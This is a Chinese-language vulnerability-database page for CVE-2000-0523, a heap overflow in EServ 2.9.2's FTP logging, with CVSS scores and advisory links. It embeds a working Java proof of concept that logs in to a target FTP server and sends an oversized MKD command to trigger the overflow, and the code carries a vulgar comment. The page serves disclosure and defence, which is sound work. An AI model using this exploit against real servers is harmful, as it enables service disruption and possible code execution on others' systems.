CVE-2000-0523
CVSS10.0
发布时间 :2000-06-06 00:00:00
修订时间 :2008-09-05 16:21:13
NMCOE    

[原文]Buffer overflow in the logging feature of EServ 2.9.2 and earlier allows an attacker to execute arbitrary commands via a long MKD command.


[CNNVD]EServ 2.9.2日志记录功能缓冲区溢出漏洞(CNNVD-200006-025)

        EServ 2.9.2和以前的版本中日志记录功能存在缓冲区溢出漏洞。攻击者借助超长MKD命令可以执行任意命令。

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0523
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0523
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200006-025
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/static/4614.php
(VENDOR_ADVISORY)  XF  eserv-logging-overflow
http://www.securityfocus.com/bid/1315
(VENDOR_ADVISORY)  BID  1315
http://archives.neohapsis.com/archives/bugtraq/2000-06/0009.html
(VENDOR_ADVISORY)  BUGTRAQ  20000606 MDMA Advisory #6: EServ Logging Heap Overflow Vulnerability

- 漏洞信息

EServ 2.9.2日志记录功能缓冲区溢出漏洞
危急 缓冲区溢出
2000-06-06 00:00:00 2005-05-02 00:00:00
远程  
        EServ 2.9.2和以前的版本中日志记录功能存在缓冲区溢出漏洞。攻击者借助超长MKD命令可以执行任意命令。

- 公告与补丁

        

- 漏洞信息 (19997)

Etype Eserv 2.9.2 Logging Buffer Overflow Vulnerability (EDBID:19997)
windows remote
2000-05-10 Verified
0 Wizdumb
N/A [点击下载]
source: http://www.securityfocus.com/bid/1315/info

EType EServ is a combination mail, news, HTTP, FTP, and proxy server.

The logging mechanism in EType EServ is vulnerable to a heap buffer overflow that could allow remote attackers to execute arbitrary code on the server. The overflow occurs when a MKD command with an unusually long argument is sent to the FTP Server port. 

/* Proof of concept code for the heap overflow in EServ <= 2.9.2
 * Written 10/05/2000 by Andrew Lewis aka. Wizdumb [MDMA]
 */

import java.io.*;
import java.net.*;

class eservheap {

public static void main(String[] args) throws IOException {

  if (args.length < 1) {
    System.out.println("Syntax: java eservheap [host] <user> <pass>");
    System.exit(1); }

  Socket soq = null;
  PrintWriter white = null;
  BufferedReader weed = null;

  try {
    soq = new Socket(args[0], 21);
    white = new PrintWriter(soq.getOutputStream(), true);
    weed = new BufferedReader(new
InputStreamReader(soq.getInputStream()));
  } catch (Exception e) {
    System.out.println("Problems connecting :-/");
    System.exit(1); }

  weed.readLine();
  String juzer = (args.length == 3) ? ("USER " + args[1]) : "USER
anonymous";
  String pasz =  (args.length == 3) ? ("PASS " + args[2]) : "PASS mdma";
  white.println(juzer + "\n" + pasz);
  weed.readLine();
  weed.readLine();

  white.print("MKD ");
  for (int i = 0; i < 10000; i++) white.print("A");
  white.println(); // uNf! Who yoh daddy, bitch?
  weed.readLine();
  white.println("QUIT"); } }
		

- 漏洞信息

1380
Etype Eserv MKD Command Logging Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Solution Unknown
Exploit Public Third-party Verified, Uncoordinated Disclosure

- 漏洞描述

- 时间线

2000-06-06 Unknow
Unknow Unknow

- 解决方案

OSVDB is not aware of a solution for this vulnerability.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站